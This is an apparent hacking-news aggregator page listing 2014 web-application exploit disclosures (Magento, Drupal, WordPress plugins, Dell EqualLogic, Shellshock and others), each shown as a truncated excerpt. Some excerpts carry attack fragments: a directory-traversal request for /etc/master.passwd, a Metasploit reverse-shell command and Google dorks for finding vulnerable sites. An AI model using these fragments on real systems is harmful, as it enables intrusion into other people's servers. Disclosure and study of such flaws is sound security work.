记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

WEB应用漏洞: - Magento Server MAGMI Plugin - Remote File Inclusion (RFI)

Exploit found date: 10/24/2014Security Researcher name: Parvinder Singh BhasinContact info: parvinder.bhasin@gmail.comtwitter: @parvinderb <scorpio>Currently tested version:Magento version: Magento CE - 1.8 and newer versionsMAGMI version: v0.7.17a and greaterMAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allow
发布时间:2014-10-25 19:25 | 阅读:106098 | 评论:0 | 标签:webapps

WEB应用漏洞: - Dell EqualLogic Storage - Remote File Inclusion

# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0Storage# Date: 09/2013# Exploit Author: Mauricio Pampim Corr�a# Vendor Homepage: www.dell.com# Version: 6.0# Tested on: Equipment Model Dell EqualLogic PS4000# CVE : CVE-2013-3304 The malicious user sends GET //../../../../../../../../etc/master.passwd And the Dell Storage answers r
发布时间:2014-10-25 19:25 | 阅读:85208 | 评论:0 | 标签:webapps

WEB应用漏洞: - Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability

#!/usr/bin/python## Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability# Wordpress plugin version: <= 0.9.7# Joomla extension version: <= 2.0.0# # Vulnerability discovered by Gianni Angelozzi## Exploit written by Claudio Viviani## Dork google wordpress: inurl:inurl:sexy-contact-form# Dork goo
发布时间:2014-10-25 19:25 | 阅读:159427 | 评论:0 | 标签:webapps

WEB应用漏洞: - Creative Contact Form - Arbitrary File Upload

=========================================================="Creative Contact Form - The Best WordPress Contact Form Builder" -Arbitrary File Upload# Author: Gianni Angelozzi# Date: 08/10/2014# Remote: Yes# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/# Software Link: https://wordpress.org/plugins/sexy-contact-form/# CVE: CVE-
发布时间:2014-10-23 23:40 | 阅读:107362 | 评论:0 | 标签:webapps

WEB应用漏洞: - DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload

# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload# Date: 23/01/2014# Author: Glafkos Charalambous# Version: 3.0.0# Vendor: DNNspot# Vendor URL: https://www.dnnspot.com# Google Dork: inurl:/DesktopModules/DNNspot-Store/## root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/revers
发布时间:2014-10-23 06:10 | 阅读:114375 | 评论:0 | 标签:webapps

WEB应用漏洞: - ZTE ZXDSL-931VII - Unauthenticated Configuration Dump

# Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump# Google Dork: use your imagination # Date: 09-12-2014# Exploit Author: L0ukanik0sGR# Vendor Homepage: www.zte.com.cn# Software Link: https://www.ote.gr/web/guest/help-and-support/internet/vdsl/-/support/article/870213%3Bjsessionid=01605E58A483CF54BB0E95208F531764.node3_1_OTEGR?! original fi
发布时间:2014-10-21 01:40 | 阅读:89062 | 评论:0 | 标签:webapps

WEB应用漏洞: - Typo3 JobControl 2.14.0 - Cross Site Scripting / SQL Injection

Mogwai Security Advisory MSA-2014-02----------------------------------------------------------------------Title: JobControl (dmmjobcontrol) Multiple VulnerabilitiesProduct: dmmjobcontrol (Typo3 Extension)Affected versions: 2.14.0Impact: highRemote: yesProduct link: http://typo3.org/extensions/repository/
发布时间:2014-10-21 01:40 | 阅读:108989 | 评论:0 | 标签:webapps

WEB应用漏洞: - Drupal Core <= 7.32 - SQL Injection (PHP)

<?php#-----------------------------------------------------------------------------## Exploit Title: Drupal core 7.x - SQL Injection ## Date: Oct 16 2014 ## Exploit Author: Dustin Dörr ## Software Link: http://www.drupal.c
发布时间:2014-10-17 19:55 | 阅读:100137 | 评论:2 | 标签:webapps

WEB应用漏洞: - Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities

Document Title:===============Indeed Job Search 2.5 iOS API - Multiple VulnerabilitiesReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=1303Release Date:=============2014-10-13Vulnerability Laboratory ID (VL-ID):====================================1303Common Vulnerability Scoring System:==============================
发布时间:2014-10-16 02:00 | 阅读:79967 | 评论:0 | 标签:webapps

WEB应用漏洞: - PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability

Document Title:===============PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass VulnerabilityReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=895PayPal Security UID: Vxda0SVideo: http://www.vulnerability-lab.com/get_content.php?id=1338View: https://www.youtube.com/watch?v=RXubXP_r2M4Release Date:=============2014-10-09Vuln
发布时间:2014-10-15 01:00 | 阅读:132273 | 评论:0 | 标签:webapps

WEB应用漏洞: - Tenda A32 Router - CSRF Vulnerability

# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)# CVE ID :CVE-2014-7281# Date: 2014-10-10# Exploit Author: zixian# Vendor Homepage: http://tenda.com.cn/# Software Link: http://tenda.com.cn/Catalog/Product/325# Version: V5.07.53_CNWhen the administrator login, click on the link below, the device will reboot。<a href="http://192.1
发布时间:2014-10-15 01:00 | 阅读:135236 | 评论:0 | 标签:webapps CSRF

WEB应用漏洞: - BMC Track-It! - Multiple Vulnerabilities

>> Multiple critical vulnerabilities in BMC Track-It!>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security=================================================================================The application exposes several .NET remoting services on port 9010..NET remoting is a RMI technology similar to Java RMI or CORBA which
发布时间:2014-10-10 06:35 | 阅读:90248 | 评论:0 | 标签:webapps

WEB应用漏洞: - DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities

DrayTek VigorACS SI ( <= 1.3.0)Vigor ACS-SI Edition is a Central Management System for DrayTekrouters and firewalls,providing System Integrators or system administration personnel areal-time integratedmonitoring, configuration and management platform.-----------------------------------------------------------------------2.1. Default http-auth username/pas
发布时间:2014-10-10 06:35 | 阅读:88894 | 评论:0 | 标签:webapps

WEB应用漏洞: - Nessus Web UI 2.3.3 - Stored XSS

Nessus Web UI 2.3.3: Stored XSS=========================================================CVE number: CVE-2014-7280Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.htmlVendor advisory: http://www.tenable.com/security/tns-2014-08-- Info --Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Sec
发布时间:2014-10-10 06:35 | 阅读:129277 | 评论:0 | 标签:webapps xss

WEB应用漏洞: - Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)

#!/usr/bin/env python## WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit## WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)## Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/## Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.
发布时间:2014-10-08 06:05 | 阅读:106034 | 评论:0 | 标签:webapps exp

WEB应用漏洞: - Bash - CGI RCE (MSF) Shellshock Exploit

### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name'
发布时间:2014-10-06 21:45 | 阅读:93364 | 评论:0 | 标签:webapps exp

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云